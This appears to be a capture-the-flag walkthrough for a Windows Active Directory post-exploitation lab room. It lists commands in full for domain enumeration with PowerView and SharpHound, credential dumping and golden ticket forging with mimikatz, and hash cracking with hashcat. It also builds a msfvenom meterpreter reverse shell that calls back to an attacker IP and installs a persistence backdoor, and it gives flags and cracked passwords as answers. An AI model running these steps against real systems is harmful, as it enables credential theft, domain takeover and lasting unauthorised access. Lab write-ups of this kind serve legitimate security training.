Post-Exploitation Basics - Easy
- Enumeration with Powerview
- Enumeration with Bloodhound
- Dumping hashes with mimikatz
- Golden Ticket Attacks with mimikatz
- Enumeration with Server Manager
- Maintaining Access
Enumeration with Powerview
-
Powerview is a PowerShell script for enumerating a domain after gaining a shell in the system.
-
We can use resources such as PowerView CheatSheet.
shell
ssh Administrator@10.10.199.137
#ssh into target machine
powershell -ep bypass
#bypass execution policy of powershell
#to run scripts
. .\Downloads\PowerView.ps1
#start powerview
Get-NetUser | select cn
#enumerate domain users
#gives flag
Get-NetGroup -GroupName *admin*
#enumerate domain groups
Invoke-ShareFinder
#find shares
Get-NetComputer -FullData
#return full info of computers
markdown
1. What is the shared folder that is not set by default? - Share
2. What operating system is running inside of the network besides Windows Server 2019? - Windows 10 Enterprise Evaluation
3. Find the flag. - POST{P0W3RV13W_FTW}
Enumeration with Bloodhound
-
Bloodhound is a GUI used to visually map out the network.
-
It is used with SharpHound (like PowerView) to get network details into .json files.
shell
#on attacker machine
sudo neo4j console
#start neo4j
#on target machine
powershell -ep bypass
. .\Downloads\SharpHound.ps1
#start SharpHound
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
#get loot with SharpHound
dir
#to check loot file
#on attacker machine
#copy loot file using scp
scp Administrator@10.10.199.137:C:/Users/Administrator/20220519113424_loot.zip ~/
bloodhound
#login
#change default creds neo4j:neo4j
#once inside bloodhound GUI, import loot zip file
#use queries
markdown
1. What service is also a domain admin? - sqlservice
2. What two users are Kerberoastable? - sqlservice, krbtgt
Dumping hashes with mimikatz
shell
#in target machine
cd Downloads
mimikatz.exe
privilege::debug
lsadump::lsa /patch
#dump hashes
#in attacker machine
#copy hashes and crack
hashcat -m 1000 machine1hash.txt /usr/share/wordlists/rockyou.txt
markdown
1. What is the Machine 1 password? - Password1
2. What is the Machine 2 hash? - c39f2beb3d2ec06a62cb887fb391dee0
Golden Ticket Attacks with mimikatz
shell
mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:
#sid, krbtgt and id to be filled from previous command
#use golden ticket to access other machines
misc::cmd
#cmd with elevated privileges
Enumeration with Server Manager
shell
sudo vim /etc/hosts
#add 10.10.199.137:CONTROLLER.local to hosts
rdesktop -u Administrator -p 'P@$$W0rd' -d CONTROLLER -v 10.10.199.137
#rdp
markdown
We can open Windows Server Manager now and view the tabs.
Mainly, we can check the Tools and Manage tabs.
Navigate to Tools > Active Directory Users and Computers.
We can view the password for SQL Service.
markdown
1. What tool allows to view the event logs? - Event Viewer
2. What is the SQL Service password? - MYpassword123#
Maintaining Access
shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.48.136 LPORT=4444 -f exe -o payload.exe
#generate payload
#transfer payload from attacker to target machine
#in attacker machine
msfconsole
use /exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
#set required options
run
#get meterpreter shell
background
use exploit/windows/local/persistence
set session 1
#persistence module creates a backdoor